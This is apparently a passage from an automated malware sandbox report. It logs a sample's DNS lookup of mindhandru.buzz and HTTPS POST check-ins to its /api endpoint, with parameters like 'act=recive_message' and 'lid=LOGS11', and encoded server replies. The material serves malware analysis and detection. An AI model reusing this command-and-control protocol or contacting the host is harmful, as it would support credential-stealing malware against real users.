                                                                                              Dec 27, 2024 08:52:48.566622019 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566665888 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566682100 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.566690922 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.566745996 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.686094999 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.690155029 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.690207958 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.690248013 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.690273046 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.690313101 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.690360069 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.690360069 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.690478086 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.690495968 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.690510988 CET49702443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.690516949 CET44349702104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.962174892 CET49703443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.962234020 CET44349703104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:48.962315083 CET49703443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.962790966 CET49703443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:48.962802887 CET44349703104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:50.223952055 CET44349703104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:50.224169016 CET49703443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:50.225666046 CET49703443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:50.225682020 CET44349703104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:50.226000071 CET44349703104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:50.227370977 CET49703443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:50.227530003 CET49703443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:50.227565050 CET44349703104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:51.263036013 CET44349703104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:51.263145924 CET44349703104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:51.266550064 CET49703443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:51.266630888 CET49703443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:51.266650915 CET44349703104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:51.444758892 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:51.444811106 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:51.444914103 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:51.445231915 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:51.445244074 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.704725981 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.704999924 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.706315994 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.706326962 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.706629038 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.708029985 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.708152056 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.708180904 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:52.708240986 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:52.755346060 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:59.962419033 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:59.962528944 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:52:59.962579966 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:59.974379063 CET49709443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:52:59.974411011 CET44349709104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:00.278326988 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:00.278366089 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:00.278445959 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:00.278740883 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:00.278752089 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.537177086 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.537276030 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.538604021 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.538620949 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.538878918 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.545842886 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.545991898 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.546025991 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:01.546107054 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:01.546119928 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:02.505861044 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:02.505959034 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:02.506015062 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:02.537358999 CET49733443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:02.537399054 CET44349733104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:03.052781105 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:03.052838087 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:03.052922010 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:03.053272963 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:03.053289890 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:04.266855955 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:04.266974926 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:04.268425941 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:04.268438101 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:04.268681049 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:04.277715921 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:04.277715921 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:04.277748108 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.022902966 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.023011923 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.023210049 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.023308992 CET49741443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.023329973 CET44349741104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.585314035 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.585347891 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:05.585402966 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.586052895 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:05.586066008 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.862765074 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.862831116 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.865878105 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.865886927 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.866127014 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.872092009 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.872837067 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.872867107 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.872970104 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.872999907 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.873188019 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.873224020 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874197960 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874226093 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874366999 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874397993 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874615908 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874648094 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874656916 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874667883 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874811888 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874840021 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.874862909 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.874996901 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.875022888 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.919327021 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.922739029 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.922770977 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.922795057 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.922816038 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.922833920 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.922847033 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:06.922872066 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:06.922877073 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:10.990108013 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:10.990396976 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:10.990475893 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:10.990771055 CET49748443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:10.990789890 CET44349748104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:11.002892017 CET49763443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:11.002938986 CET44349763104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:11.003148079 CET49763443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:11.003447056 CET49763443192.168.2.7104.21.11.101
                                                                                              Dec 27, 2024 08:53:11.003462076 CET44349763104.21.11.101192.168.2.7
                                                                                              Dec 27, 2024 08:53:12.098083019 CET49763443192.168.2.7104.21.11.101

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 27, 2024 08:52:44.131937027 CET5433753192.168.2.71.1.1.1
                                                                                              Dec 27, 2024 08:52:44.269834042 CET53543371.1.1.1192.168.2.7

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 27, 2024 08:52:44.131937027 CET192.168.2.71.1.1.10x4f81Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 27, 2024 08:52:44.269834042 CET1.1.1.1192.168.2.70x4f81No error (0)mindhandru.buzz104.21.11.101A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2024 08:52:44.269834042 CET1.1.1.1192.168.2.70x4f81No error (0)mindhandru.buzz172.67.165.185A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • mindhandru.buzz

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.749700104.21.11.1014437380C:\Users\user\Desktop\ARoqFi68Nr.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 07:52:45 UTC262OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: mindhandru.buzz
                                                                                              2024-12-27 07:52:45 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                              Data Ascii: act=life
                                                                                              2024-12-27 07:52:46 UTC1125INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 07:52:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=v7bi6go2hcrvifvfsd1n8n2ftk; expires=Tue, 22 Apr 2025 01:39:25 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqPCN36Uv%2BJCgmDWWF8XWIRGJwEWhiVu%2F6t12K3jmSRTHAOYuNoYpDwfQz5goYtjdYhW%2FcFd2y7zD4X2EMjT4HPv%2B2eJoecGb3Li0qLsE2K3ATHTXdgu5fmt4R7rSkTVUDk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f87bba66a945e71-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1588&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1801357&cwnd=238&unsent_bytes=0&cid=2e067d61d317d6f7&ts=773&x=0"
                                                                                              2024-12-27 07:52:46 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                              Data Ascii: 2ok
                                                                                              2024-12-27 07:52:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.749702104.21.11.1014437380C:\Users\user\Desktop\ARoqFi68Nr.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 07:52:47 UTC263OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 53
                                                                                              Host: mindhandru.buzz
                                                                                              2024-12-27 07:52:47 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                              2024-12-27 07:52:48 UTC1125INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 07:52:48 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=316khfvtahro8dajcoo5klplrb; expires=Tue, 22 Apr 2025 01:39:27 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XA2pQlfPdsWRqJMf9r1LOihTS0Ti0d0d3iuRuGvs2Quw796PGjdpTy6d8%2B6yW3%2Fj99k%2FnTf7bWQFQac%2BoCqapLKdccrNC6TlbMAEQczQM0CCl6fTRkvlwqZuMAUC3AE1s2k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f87bbb3fdb442d5-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1621&rtt_var=640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=952&delivery_rate=1667618&cwnd=221&unsent_bytes=0&cid=12fad0f9f9530f27&ts=778&x=0"
                                                                                              2024-12-27 07:52:48 UTC244INData Raw: 32 34 61 63 0d 0a 6a 6e 7a 50 38 78 36 4c 55 33 74 70 75 4e 42 35 75 76 4a 33 64 4f 4d 77 4e 31 71 49 47 2f 2f 4e 6c 51 42 69 77 43 59 4a 72 4b 37 31 58 72 6e 52 4a 4c 39 2f 57 52 72 64 38 6b 50 4f 67 41 49 52 7a 78 4a 57 50 71 6f 68 6d 61 7a 35 63 77 66 73 42 48 2f 42 6a 4c 51 61 72 70 39 74 37 6e 39 5a 44 4d 44 79 51 2b 47 4a 56 52 47 4e 45 67 31 34 37 58 47 64 72 50 6c 69 41 36 74 4a 65 63 44 4e 35 68 43 6f 6d 33 76 6f 4e 78 6f 46 31 62 55 63 33 35 4d 64 47 6f 70 64 58 7a 65 71 4e 39 32 6f 37 79 4a 59 34 6d 74 73 32 4d 2f 44 48 62 79 59 50 50 5a 2f 41 45 76 64 76 6c 75 41 30 42 59 52 67 56 78 52 50 75 4e 7a 6c 36 58 78 59 77 61 71 56 6d 44 4b 78 75 59 65 71 35 70 78 34 53 4d 58 44 39 4b 2b 47 74 57 54 56 56 6a 42 56 55
                                                                                              Data Ascii: 24acjnzP8x6LU3tpuNB5uvJ3dOMwN1qIG//NlQBiwCYJrK71XrnRJL9/WRrd8kPOgAIRzxJWPqohmaz5cwfsBH/BjLQarp9t7n9ZDMDyQ+GJVRGNEg147XGdrPliA6tJecDN5hCom3voNxoF1bUc35MdGopdXzeqN92o7yJY4mts2M/DHbyYPPZ/AEvdvluA0BYRgVxRPuNzl6XxYwaqVmDKxuYeq5px4SMXD9K+GtWTVVjBVU
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 31 34 73 6a 6e 4f 6e 66 52 7a 45 62 64 4a 65 38 69 4d 38 31 43 30 30 58 76 6c 63 55 46 4c 30 72 34 56 33 5a 4d 61 45 59 42 53 52 7a 66 71 65 70 57 6e 38 32 67 50 72 55 74 6c 78 4d 76 6b 46 36 71 65 65 2b 45 33 46 67 69 61 2f 46 76 66 69 46 56 4f 77 58 4a 46 4f 2b 6c 74 6b 4c 36 33 66 55 36 37 42 47 7a 43 6a 4c 52 65 71 35 39 39 35 44 45 4c 41 39 47 35 48 73 71 62 48 42 75 4d 55 6c 67 79 35 58 71 64 71 50 31 6f 44 36 68 41 5a 73 50 4b 37 42 37 74 33 7a 7a 75 4b 56 6c 54 6d 70 45 65 79 4a 63 5a 41 4d 4e 6f 46 53 65 6b 59 4e 32 6f 2b 79 4a 59 34 6b 78 75 7a 63 2f 6e 45 61 36 5a 64 2f 73 78 43 77 33 58 74 77 6e 65 6c 52 73 63 67 6b 42 66 4e 75 78 36 6c 4b 54 2b 5a 77 65 6d 42 43 57 4f 79 2f 52 65 39 64 46 64 35 44 6f 56 41 63 32 79 57 38 66 65 44 46 61 47 58
                                                                                              Data Ascii: 14sjnOnfRzEbdJe8iM81C00XvlcUFL0r4V3ZMaEYBSRzfqepWn82gPrUtlxMvkF6qee+E3Fgia/FvfiFVOwXJFO+ltkL63fU67BGzCjLReq5995DELA9G5HsqbHBuMUlgy5XqdqP1oD6hAZsPK7B7t3zzuKVlTmpEeyJcZAMNoFSekYN2o+yJY4kxuzc/nEa6Zd/sxCw3XtwnelRscgkBfNux6lKT+ZwemBCWOy/Re9dFd5DoVAc2yW8feDFaGX
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 32 6b 4b 4f 33 4c 45 43 6c 58 43 75 57 6a 4d 59 64 75 5a 4a 32 71 77 51 61 42 64 53 31 44 5a 69 50 57 77 2f 42 56 56 6c 34 73 6a 6d 51 72 76 39 6b 45 71 31 4a 61 4d 44 43 34 78 75 69 6d 58 7a 70 50 42 77 50 30 62 6b 59 31 5a 51 48 48 49 46 61 55 44 6e 67 63 39 33 68 74 32 55 59 34 68 77 72 2f 39 76 6e 58 4a 69 53 63 75 63 32 44 30 76 46 2f 41 4b 59 6c 78 6c 57 32 52 4a 59 4d 4f 39 38 6b 71 37 39 62 41 57 6f 53 47 50 41 7a 2f 34 52 71 5a 46 77 34 54 73 55 42 64 36 36 45 74 4f 62 45 78 61 41 57 42 56 32 71 6e 36 46 37 36 38 69 4e 4b 56 49 5a 73 47 4f 32 52 32 6a 6e 33 76 2f 63 51 5a 46 77 2f 49 63 31 4e 42 4e 56 6f 31 62 56 54 50 67 66 5a 32 6f 2b 6d 63 44 70 55 64 6d 79 63 62 69 47 61 6d 64 64 65 51 33 47 51 7a 65 74 77 6e 64 6d 52 6b 61 77 52 77 56 50 2f
                                                                                              Data Ascii: 2kKO3LEClXCuWjMYduZJ2qwQaBdS1DZiPWw/BVVl4sjmQrv9kEq1JaMDC4xuimXzpPBwP0bkY1ZQHHIFaUDngc93ht2UY4hwr/9vnXJiScuc2D0vF/AKYlxlW2RJYMO98kq79bAWoSGPAz/4RqZFw4TsUBd66EtObExaAWBV2qn6F768iNKVIZsGO2R2jn3v/cQZFw/Ic1NBNVo1bVTPgfZ2o+mcDpUdmycbiGamddeQ3GQzetwndmRkawRwVP/
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 74 32 55 4d 34 68 77 72 78 38 58 2b 45 4b 4f 59 63 65 38 35 48 67 58 58 75 52 33 54 6c 78 49 51 6a 46 70 59 50 65 6c 34 6d 61 58 6c 59 51 75 6f 53 57 47 4f 67 71 77 5a 74 64 45 6b 71 52 59 56 49 73 71 70 43 63 37 51 43 6c 69 59 45 6c 49 30 71 69 48 64 72 50 68 72 44 36 70 4d 5a 4d 48 49 34 68 69 72 6e 48 6e 6d 4f 77 73 44 31 4c 38 51 31 35 73 48 46 6f 78 57 57 54 7a 69 63 70 66 76 75 53 49 48 75 67 51 7a 6a 76 6e 68 45 61 32 53 61 71 6b 75 56 78 4b 61 74 52 65 59 79 46 55 61 6a 31 4a 61 4e 4f 5a 79 6c 61 37 37 62 41 65 6e 54 57 50 47 33 75 30 61 70 5a 42 79 35 6a 41 64 44 74 2b 32 48 4e 79 57 47 6c 62 50 45 6c 49 67 71 69 48 64 67 4e 42 58 51 6f 4e 2b 4b 39 47 43 39 56 36 71 6e 54 79 78 63 52 55 49 31 72 6f 55 33 70 6b 5a 48 49 68 5a 57 54 50 75 64 5a 53
                                                                                              Data Ascii: t2UM4hwrx8X+EKOYce85HgXXuR3TlxIQjFpYPel4maXlYQuoSWGOgqwZtdEkqRYVIsqpCc7QCliYElI0qiHdrPhrD6pMZMHI4hirnHnmOwsD1L8Q15sHFoxWWTzicpfvuSIHugQzjvnhEa2SaqkuVxKatReYyFUaj1JaNOZyla77bAenTWPG3u0apZBy5jAdDt+2HNyWGlbPElIgqiHdgNBXQoN+K9GC9V6qnTyxcRUI1roU3pkZHIhZWTPudZS
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 61 4e 43 65 63 6e 46 2f 68 43 67 6e 6e 54 68 4f 42 67 50 33 37 38 64 31 4a 6f 55 45 59 39 63 58 58 69 6b 4f 5a 71 33 74 7a 70 41 67 31 52 77 33 4e 72 68 50 36 43 65 50 50 5a 2f 41 45 76 64 76 6c 75 41 30 42 77 45 68 56 39 48 4d 65 31 33 6b 71 7a 6c 59 77 32 70 56 6d 7a 42 79 4f 73 53 71 35 35 36 36 44 51 54 42 39 32 33 45 4e 65 63 56 56 6a 42 56 55 31 34 73 6a 6d 7a 70 4f 52 31 41 36 78 50 66 64 57 4d 38 31 43 30 30 58 76 6c 63 55 46 4c 32 62 6b 51 33 4a 41 5a 46 6f 56 66 56 53 72 6c 66 70 71 6d 2f 48 41 4b 70 55 4e 67 78 73 66 6a 47 4c 2b 64 63 76 73 30 43 78 6d 61 2f 46 76 66 69 46 56 4f 77 57 52 53 4b 50 70 36 33 35 37 68 59 52 61 70 53 57 65 4f 30 36 49 48 37 5a 5a 77 71 57 6c 5a 44 64 57 37 47 4e 65 52 48 42 71 4d 56 31 77 39 36 33 2b 5a 70 66 31 69
                                                                                              Data Ascii: aNCecnF/hCgnnThOBgP378d1JoUEY9cXXikOZq3tzpAg1Rw3NrhP6CePPZ/AEvdvluA0BwEhV9HMe13kqzlYw2pVmzByOsSq5566DQTB923ENecVVjBVU14sjmzpOR1A6xPfdWM81C00XvlcUFL2bkQ3JAZFoVfVSrlfpqm/HAKpUNgxsfjGL+dcvs0Cxma/FvfiFVOwWRSKPp6357hYRapSWeO06IH7ZZwqWlZDdW7GNeRHBqMV1w963+Zpf1i
                                                                                              2024-12-27 07:52:48 UTC1369INData Raw: 53 41 31 61 77 5a 6f 64 45 6b 71 54 49 65 43 4e 75 34 45 74 53 66 45 68 4b 54 57 46 49 71 36 33 69 57 6f 76 74 69 44 61 39 4f 61 73 66 42 34 42 4f 71 6c 6e 50 73 63 56 64 4c 33 61 70 62 67 4e 41 30 47 34 70 65 44 6d 4b 71 5a 74 4f 32 74 32 55 4d 34 68 77 72 7a 73 62 70 46 4b 43 53 63 2b 6f 6a 47 41 33 49 73 68 62 53 67 68 38 64 68 46 39 59 4e 65 6c 2f 6d 36 54 37 63 41 6d 69 52 32 43 4f 67 71 77 5a 74 64 45 6b 71 52 49 4f 48 64 43 31 46 38 36 62 46 42 57 58 58 30 56 34 70 44 6d 4d 71 4f 59 69 57 4c 52 55 66 4d 6e 54 6f 67 66 74 6c 6e 43 70 61 56 6b 4e 30 37 51 63 33 70 34 48 45 34 64 64 57 6a 48 6a 66 5a 57 73 39 32 59 45 70 55 46 6f 77 73 66 72 48 61 4b 56 64 65 63 34 46 6b 75 55 38 68 7a 41 30 45 31 57 6f 45 6c 57 4e 4f 63 35 67 75 48 75 49 67 65 75 42
                                                                                              Data Ascii: SA1awZodEkqTIeCNu4EtSfEhKTWFIq63iWovtiDa9OasfB4BOqlnPscVdL3apbgNA0G4peDmKqZtO2t2UM4hwrzsbpFKCSc+ojGA3IshbSgh8dhF9YNel/m6T7cAmiR2COgqwZtdEkqRIOHdC1F86bFBWXX0V4pDmMqOYiWLRUfMnTogftlnCpaVkN07Qc3p4HE4ddWjHjfZWs92YEpUFowsfrHaKVdec4FkuU8hzA0E1WoElWNOc5guHuIgeuB
